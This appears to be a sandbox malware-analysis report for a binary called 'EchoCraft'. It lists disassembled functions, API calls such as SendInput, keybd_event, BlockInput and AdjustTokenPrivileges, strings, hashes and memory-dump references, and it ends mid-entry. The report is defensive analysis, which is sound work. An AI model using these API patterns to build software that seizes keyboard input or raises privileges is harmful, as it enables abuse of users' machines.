Instruction ID: d8078da8409e4258458bf574ce4c954e88a6294b26c6a7fbc299d8709164eb6e
Opcode Fuzzy Hash: bea0e835a2867820533703eb96f8cbe99ff7ce003d778000efe5f7608422006c
Instruction Fuzzy Hash: 0DD0CAF490112DEACF80CBA0EC8CDEAB3BCBB08304F108592F146E6100DB7096498B20

Function 00AF40CC Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B05065,?,?,00000035,?), ref: 00AF40FB
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B05065,?,?,00000035,?), ref: 00AF410B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b40f1e490bcdaccdef26fa2171c9bc4843cb9938083657bb6b35702da1a2849e
Instruction ID: 9a05391300a8208b59f0fb7538cff7c9ccada7282a48274db97ad17ef62ce5ea
Opcode Fuzzy Hash: b40f1e490bcdaccdef26fa2171c9bc4843cb9938083657bb6b35702da1a2849e
Instruction Fuzzy Hash: 47F0E5307002296AEB2067A99D4DFEB7A6DEFC8B61F000265F505D3281D9709940C7B0

Function 00AEBA4A Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AEBA81
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00AEBA94

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 27159a8a29e19bca8285806e3195eb0b369b807f83224f8649d23de443ec77fd
Instruction ID: 3e1053b6ea4230d722f0365bdd45d4028b1b76991e96e2f2da2d1e623b8ec520
Opcode Fuzzy Hash: 27159a8a29e19bca8285806e3195eb0b369b807f83224f8649d23de443ec77fd
Instruction Fuzzy Hash: 0BF06D7080028EAFDF018FA1C809BEE7BB0FF04309F00801AF955A6191C3798601DFA4

Function 00AE1939 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AE1A76), ref: 00AE194E
CloseHandle.KERNEL32(?,?,00AE1A76), ref: 00AE1963

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 47a8d02f1897c17e7f660cbc6cf84d970ffc93f5db4f22ac60e41baa051c81a1
Instruction ID: 48c0cb4df19258ad87f34b307f8043d8f76d07205cbfd4b7b2711596af3f0369
Opcode Fuzzy Hash: 47a8d02f1897c17e7f660cbc6cf84d970ffc93f5db4f22ac60e41baa051c81a1
Instruction Fuzzy Hash: CEE0BF72014620AFE7252B11FD0AFB67BA9EB04750F14891DF5A5814B1DB726C90DB54

Function 00AFF2E8 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00AFF303

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 91d05e1484f72490292452566470767917c5dadb0d299450ff2fc0dae08d6355
Instruction ID: 0b2d9c04e122b8574932aca2de8302767c344c775e94fabfc1e4f6c944b9f4b7
Opcode Fuzzy Hash: 91d05e1484f72490292452566470767917c5dadb0d299450ff2fc0dae08d6355
Instruction Fuzzy Hash: 6BE04F36200204AFC710EF9AD944E9AB7E9AF94774F00802AF949DB351DA74E8408BA0

Function 00AA0DF5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020E01,00AA080E), ref: 00AA0DFA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 660c127a7acdda976d68ff89d365c8ab46810d904d32aa56238aa1b65a0190f6
Instruction ID: 2e0280544e69bbd3602d5cf1d05264ed8e22880e5f9d51cfc4f88227bfafdd55
Opcode Fuzzy Hash: 660c127a7acdda976d68ff89d365c8ab46810d904d32aa56238aa1b65a0190f6
Instruction Fuzzy Hash:

Function 00B032B1 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B03303
DeleteObject.GDI32(00000000), ref: 00B03316
DestroyWindow.USER32 ref: 00B03325
GetDesktopWindow.USER32 ref: 00B03340
GetWindowRect.USER32(00000000), ref: 00B03347
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B03476
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B03484
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B034CB
GetClientRect.USER32(00000000,?), ref: 00B034D7
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B03513
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B03535
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B03548
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B03553
GlobalLock.KERNEL32(00000000), ref: 00B0355C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B0356B
GlobalUnlock.KERNEL32(00000000), ref: 00B03574
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B0357B
GlobalFree.KERNEL32(00000000), ref: 00B03586
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B03598
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B20BFC,00000000), ref: 00B035AE
GlobalFree.KERNEL32(00000000), ref: 00B035BE
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B035E4
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B03603
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B03625
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B03812

Strings

AutoIt v3, xrefs: 00B034C5
DISPLAY, xrefs: 00B03675
static, xrefs: 00B0350D, 00B03664
, xrefs: 00B03798

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 163533ce7c5dc3cda20b400650d602d063048ab132de29902e4cbebfcc87945f
Instruction ID: 41dd3d07fb6571fbe431228b4a254b2ea33ff620b8b2bb681b74aac83702130d
Opcode Fuzzy Hash: 163533ce7c5dc3cda20b400650d602d063048ab132de29902e4cbebfcc87945f
Instruction Fuzzy Hash: AB025B71900214AFDB14DF64CD89EAE7BF9FB49710F148198F915AB2A1CB74AE01CF64

Function 00B176BC Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B17716
GetSysColorBrush.USER32(0000000F), ref: 00B17747
GetSysColor.USER32(0000000F), ref: 00B17753
SetBkColor.GDI32(?,000000FF), ref: 00B1776D
SelectObject.GDI32(?,?), ref: 00B1777C
InflateRect.USER32(?,000000FF,000000FF), ref: 00B177A7
GetSysColor.USER32(00000010), ref: 00B177AF
CreateSolidBrush.GDI32(00000000), ref: 00B177B6
FrameRect.USER32(?,?,00000000), ref: 00B177C5
DeleteObject.GDI32(00000000), ref: 00B177CC
InflateRect.USER32(?,000000FE,000000FE), ref: 00B17817
FillRect.USER32(?,?,?), ref: 00B17849
GetWindowLongW.USER32(?,000000F0), ref: 00B1786B

Part of subcall function 00B179CF: GetSysColor.USER32(00000012), ref: 00B17A08
Part of subcall function 00B179CF: SetTextColor.GDI32(?,00B176DC), ref: 00B17A0C
Part of subcall function 00B179CF: GetSysColorBrush.USER32(0000000F), ref: 00B17A22
Part of subcall function 00B179CF: GetSysColor.USER32(0000000F), ref: 00B17A2D
Part of subcall function 00B179CF: GetSysColor.USER32(00000011), ref: 00B17A4A
Part of subcall function 00B179CF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B17A58
Part of subcall function 00B179CF: SelectObject.GDI32(?,00000000), ref: 00B17A69
Part of subcall function 00B179CF: SetBkColor.GDI32(?,?), ref: 00B17A72
Part of subcall function 00B179CF: SelectObject.GDI32(?,?), ref: 00B17A7F
Part of subcall function 00B179CF: InflateRect.USER32(?,000000FF,000000FF), ref: 00B17A9E
Part of subcall function 00B179CF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B17AB5
Part of subcall function 00B179CF: GetWindowLongW.USER32(?,000000F0), ref: 00B17AC2

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: bc1e1bc14343671ec40cf763e0209cab35423d52a30bbc50eea52b420988b27b
Instruction ID: aeecc48f8c1626a7ee5b85e386f8bc8137f6f47aee57ffdca93562d3f776eeb4
Opcode Fuzzy Hash: bc1e1bc14343671ec40cf763e0209cab35423d52a30bbc50eea52b420988b27b
Instruction Fuzzy Hash: 67A16E71008301FFDB119F64DC48AAA7BFAFB49320F904A19FAA2A71E0DB75D944CB51

Function 00A86799 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00A86828
SendMessageW.USER32(?,00001308,?,00000000), ref: 00AC5013
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AC504C
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AC5491

Part of subcall function 00A8670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A816CD,?,00000000,?,?,?,?,00A8169F,00000000,?), ref: 00A86772

SendMessageW.USER32(?,00001053), ref: 00AC54CD
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AC54E4
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AC54FA
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AC5505

Strings

0, xrefs: 00AC531D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: b6bee435fba5b9842415388259b684d7e320136cbdf5e57e854f5e3e03eca45b
Instruction ID: 5024498f20f092686b2d871953ac274a4717675dc1a743b5007915aa9b596923
Opcode Fuzzy Hash: b6bee435fba5b9842415388259b684d7e320136cbdf5e57e854f5e3e03eca45b
Instruction Fuzzy Hash: CF12AA70A01A01AFDB25EF24C958FA9BBE1FF45311F59856DF4498B261CB31F882CB91

Function 00B02F4D Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 288windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B02F80
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B0304B
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B03089
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B03099
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B030DF
GetClientRect.USER32(00000000,?), ref: 00B030EB
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B03132
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B03141
GetStockObject.GDI32(00000011), ref: 00B03151
SelectObject.GDI32(00000000,00000000), ref: 00B03155
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B03165
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B0316E
DeleteDC.GDI32(00000000), ref: 00B03177
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B031A3
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B031BA
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B031F5
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B03209
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B0321A
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B0324A
GetStockObject.GDI32(00000011), ref: 00B03255
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B03260
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B0326A

Strings

msctls_progress32, xrefs: 00B031EB
AutoIt v3, xrefs: 00B030D7
DISPLAY, xrefs: 00B03137
static, xrefs: 00B0312C, 00B03244

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: da55518ec6ef2d5c26612053c9d59b6f5960e67340165c58f519c0f5902c5510
Instruction ID: da5ec60e7e8658ca8c4f75592cc6f1958f2fce8521757d09982ad41f2fe4f7ed
Opcode Fuzzy Hash: da55518ec6ef2d5c26612053c9d59b6f5960e67340165c58f519c0f5902c5510
Instruction Fuzzy Hash: FEA17B71A40214BFEB14DFA4CD4AFAE7BB9EB49710F008154FA15AB2E0DB74AD01CB64

Function 00AF53F6 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AF5404
GetDriveTypeW.KERNEL32(?,00B1DB10,?,\\.\,00B1DBF4), ref: 00AF54E1
SetErrorMode.KERNEL32(00000000,00B1DB10,?,\\.\,00B1DBF4), ref: 00AF564D

Strings

Fixed, xrefs: 00AF5520
Fibre, xrefs: 00AF55C4
iSCSI, xrefs: 00AF55D9
SCSI, xrefs: 00AF55A1
CDROM, xrefs: 00AF5512
1394, xrefs: 00AF55B6
ATA, xrefs: 00AF55AF
SSD, xrefs: 00AF5561
\\.\, xrefs: 00AF5456
SATA, xrefs: 00AF55E7
Removable, xrefs: 00AF5527, 00AF552C
Network, xrefs: 00AF5519
Virtual, xrefs: 00AF55FC
SSA, xrefs: 00AF55BD
ATAPI, xrefs: 00AF55A8
FileBackedVirtual, xrefs: 00AF5603
SAS, xrefs: 00AF55E0
PhysicalDrive, xrefs: 00AF548D
RAMDisk, xrefs: 00AF550B
MMC, xrefs: 00AF55F5
RAID, xrefs: 00AF55D2
Unknown, xrefs: 00AF5504, 00AF559A
USB, xrefs: 00AF55CB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: eb0ac0599eaa210b143e36931dc5b043985138de72ad8f83dbd824e0e4391b50
Instruction ID: ffe7ce5ced6b8dbc8bf4e42dd92d8e2a061ee514d438a332c43e82783118501d
Opcode Fuzzy Hash: eb0ac0599eaa210b143e36931dc5b043985138de72ad8f83dbd824e0e4391b50
Instruction Fuzzy Hash: CD61D370E88909ABC714EBB4CA8187C77F1EF14301B6844A5F716EB2A2DB31EE41DB51

Function 00B16B02 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 460windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B16BAF
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B16C68
SendMessageW.USER32(?,00001102,00000002,?), ref: 00B16C84
GetMenuItemInfoW.USER32(?,00000030,00000000,?), ref: 00B16CD5
SetMenuItemInfoW.USER32(?,00000030,00000000,00000030), ref: 00B16D30
GetMenuItemInfoW.USER32(00000200,00000030,00000000,00000030), ref: 00B16D53
SetMenuDefaultItem.USER32(00000200,?,00000000), ref: 00B16D6F
DrawMenuBar.USER32(?), ref: 00B16D7B
SendMessageW.USER32(00000466,00000466,00000000,00000000), ref: 00B16DFD
SendMessageW.USER32(000000F1,000000F1,?,00000000), ref: 00B16F4B
SendMessageW.USER32(?,00000401,?,00000000), ref: 00B16F6F
GetFocus.USER32 ref: 00B16F75
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?), ref: 00B17030
SendMessageW.USER32(?,00000469,?,00000000), ref: 00B17043
EnableWindow.USER32(00000000,00000000), ref: 00B1707A
EnableWindow.USER32(00000001,00000001), ref: 00B17096
ShowWindow.USER32(00000010,00000000), ref: 00B1710C
ShowWindow.USER32(?,00000004), ref: 00B17122
EnableWindow.USER32(?,00000001), ref: 00B1713B

Strings

0, xrefs: 00B16CBC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$MessageSend$Menu$Item$EnableInfo$Show$DefaultDrawFocusMove
String ID: 0
API String ID: 1429628313-4108050209
Opcode ID: 97d3b09c588bd85df7c6ad8d2f3e446c8841e6cfb06f95e8696894292989761b
Instruction ID: 30f54ddd2b979477a559c7198e070eaa0d48a7e8150f120d29054c0222c82334
Opcode Fuzzy Hash: 97d3b09c588bd85df7c6ad8d2f3e446c8841e6cfb06f95e8696894292989761b
Instruction Fuzzy Hash: C302FF70208301AFD7158F24C848BEABBF5FF89314F9486ADF495972A1CB74D985CB91

Function 00B179CF Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B17A08
SetTextColor.GDI32(?,00B176DC), ref: 00B17A0C
GetSysColorBrush.USER32(0000000F), ref: 00B17A22
GetSysColor.USER32(0000000F), ref: 00B17A2D
CreateSolidBrush.GDI32(?), ref: 00B17A32
GetSysColor.USER32(00000011), ref: 00B17A4A
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B17A58
SelectObject.GDI32(?,00000000), ref: 00B17A69
SetBkColor.GDI32(?,?), ref: 00B17A72
SelectObject.GDI32(?,?), ref: 00B17A7F
InflateRect.USER32(?,000000FF,000000FF), ref: 00B17A9E
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B17AB5
GetWindowLongW.USER32(?,000000F0), ref: 00B17AC2
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B17B11
GetWindowTextW.USER32(?,00000000,00000001), ref: 00B17B3B
InflateRect.USER32(?,000000FD,000000FD), ref: 00B17B59
DrawFocusRect.USER32(?,?), ref: 00B17B64
GetSysColor.USER32(00000011), ref: 00B17B75
SetTextColor.GDI32(?,00000000), ref: 00B17B7D
DrawTextW.USER32(?,00B176DC,000000FF,?,00000000), ref: 00B17B8F
SelectObject.GDI32(?,?), ref: 00B17BA6
DeleteObject.GDI32(?), ref: 00B17BB1
SelectObject.GDI32(?,?), ref: 00B17BB7
DeleteObject.GDI32(?), ref: 00B17BBC
SetTextColor.GDI32(?,?), ref: 00B17BC2
SetBkColor.GDI32(?,?), ref: 00B17BCC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: af678a54bdd0f8804d359b17ac2f90c3cd17c8ae1f90596196f4661265cdfb83
Instruction ID: f369a656a7aa9e1fdcc9bbb75878c4a97cf671fc05fe5947047129bac5a823c5
Opcode Fuzzy Hash: af678a54bdd0f8804d359b17ac2f90c3cd17c8ae1f90596196f4661265cdfb83
Instruction Fuzzy Hash: 7F614D72944218BFDF019FA4DC49EEEBBB9EF09320F608155F915BB2A0DB759940CB90

Function 00B11709 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 275windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B1182B
GetDesktopWindow.USER32 ref: 00B11840
GetWindowRect.USER32(00000000), ref: 00B11847
GetWindowLongW.USER32(?,000000F0), ref: 00B1189C
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B118D5
